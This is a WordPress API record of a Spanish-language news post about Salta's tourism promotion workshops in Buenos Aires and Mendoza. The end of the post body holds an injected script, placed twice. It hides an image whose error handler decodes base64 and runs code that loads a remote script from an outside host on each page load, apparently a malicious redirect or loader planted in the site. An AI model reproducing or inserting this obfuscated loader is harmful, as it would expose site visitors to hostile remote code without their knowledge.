{"id":5155,"date":"2025-05-19T08:28:25","date_gmt":"2025-05-19T11:28:25","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5155"},"modified":"2025-08-13T23:33:33","modified_gmt":"2025-08-14T02:33:33","slug":"salta-se-destaco-en-buenos-aires-y-mendoza-con-sus-workshops-turisticos-y-una-fuerte-presencia-promocional","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5155","title":{"rendered":"Salta se destac\u00f3 en Buenos Aires y Mendoza con sus workshops tur\u00edsticos y una fuerte presencia promocional"},"content":{"rendered":"\n<p><strong><em>Con una importante participaci\u00f3n de prestadores tur\u00edsticos y municipios, Salta realiz\u00f3 exitosos encuentros de comercializaci\u00f3n en Buenos Aires y Mendoza, donde se mostr\u00f3 todo el potencial del destino. Autoridades provinciales destacaron la articulaci\u00f3n p\u00fablico-privada y el inter\u00e9s generado en ambos mercados.<\/em><\/strong><\/p>\n\n\n\n<p>El Ministerio de Turismo y Deportes de Salta, junto a la C\u00e1mara de Turismo y m\u00e1s de 20 prestadores del sector, encabez\u00f3 dos jornadas de intensa actividad promocional y comercial en Buenos Aires y Mendoza los d\u00edas 13 y 15 de mayo, respectivamente.<\/p>\n\n\n\n<p>Ambos workshops, desarrollados en el Hotel NH City de la Capital Federal y en el Hotel Panoramic de la ciudad de Mendoza, reunieron a operadores tur\u00edsticos, agencias de viaje y medios de comunicaci\u00f3n locales, en una apuesta fuerte por seguir posicionando a Salta como destino de referencia en el mercado nacional.<\/p>\n\n\n\n<p>Los encuentros contaron con una propuesta integral que incluy\u00f3 presentaciones institucionales, rondas de negocios y un acto central con gastronom\u00eda t\u00edpica, vinos salte\u00f1os y un espect\u00e1culo art\u00edstico con la participaci\u00f3n de&nbsp;<strong>Marina Cornejo<\/strong>&nbsp;y bailarines folkl\u00f3ricos.<\/p>\n\n\n\n<p>Estos mercados fueron elegidos estrat\u00e9gicamente no solo por su relevancia para la actividad tur\u00edstica, sino tambi\u00e9n por la conectividad a\u00e9rea directa que los une con Salta, lo que permite consolidar relaciones comerciales y facilitar el flujo de visitantes hacia la provincia.<\/p>\n\n\n\n<p>\u201cEstos workshops nos permiten mostrar la oferta tur\u00edstica de Salta de manera directa y efectiva, y adem\u00e1s estrechar lazos con operadores clave que luego nos ayudan a vender el destino. La articulaci\u00f3n p\u00fablico-privada ha sido fundamental en esta acci\u00f3n\u201d, destac\u00f3&nbsp;<strong>Laura Alcorta<\/strong>, subsecretar\u00eda de Promoci\u00f3n del Ministerio de Turismo y Deportes.<\/p>\n\n\n\n<p>Por su parte,&nbsp;<strong>Facundo Assaf<\/strong>, presidente de la C\u00e1mara de Turismo de Salta, remarc\u00f3 \u201cel compromiso de todos los actores del sector y la respuesta obtenida en ambos mercados demuestran el gran inter\u00e9s que genera Salta como destino\u201d.<\/p>\n\n\n\n<p>Adem\u00e1s de las acciones en los workshops, Salta tambi\u00e9n estuvo presente en puntos estrat\u00e9gicos de ambas ciudades promocionando la campa\u00f1a \u201cC\u00f3digo Salta\u201d, mediante acciones offline que incluyeron juegos, sorteos y premios.<\/p>\n\n\n\n<p>La propuesta dej\u00f3 en evidencia la fuerza del trabajo conjunto entre el sector p\u00fablico y privado, y la importancia de continuar con acciones de comercializaci\u00f3n en destinos con conexi\u00f3n directa con la provincia.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con una importante participaci\u00f3n de prestadores tur\u00edsticos y municipios, Salta realiz\u00f3 exitosos encuentros de comercializaci\u00f3n en Buenos Aires y Mendoza, donde se mostr\u00f3 todo el potencial del destino. Autoridades provinciales destacaron la articulaci\u00f3n p\u00fablico-privada y el inter\u00e9s generado en ambos mercados. El Ministerio de Turismo y Deportes de Salta, junto a la C\u00e1mara de Turismo [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5156,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11,18],"tags":[],"class_list":{"0":"post-5155","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5155"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5155"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5155\/revisions"}],"predecessor-version":[{"id":6493,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5155\/revisions\/6493"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5156"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5155"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5155"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5155"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}